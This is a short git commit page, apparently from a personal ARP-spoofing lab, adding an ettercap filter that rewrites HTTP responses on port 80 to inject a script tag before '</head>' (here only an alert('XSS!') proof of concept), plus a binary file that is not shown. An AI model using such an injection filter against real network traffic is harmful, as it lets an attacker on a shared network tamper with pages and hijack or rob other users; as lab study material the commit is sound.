Загрузить файлы в «arpspoofing/xss_test»

This commit is contained in:
2026-03-29 19:28:56 +00:00
parent a080a04195
commit f46cd4ff33
2 changed files with 4 additions and 0 deletions

View File

@@ -0,0 +1,4 @@
if (ip.proto == TCP && tcp.src == 80) {
replace("</head>", "<script>alert('XSS!')</script></head>");
msg("Внедрен JS в страницу!\n");
}

Binary file not shown.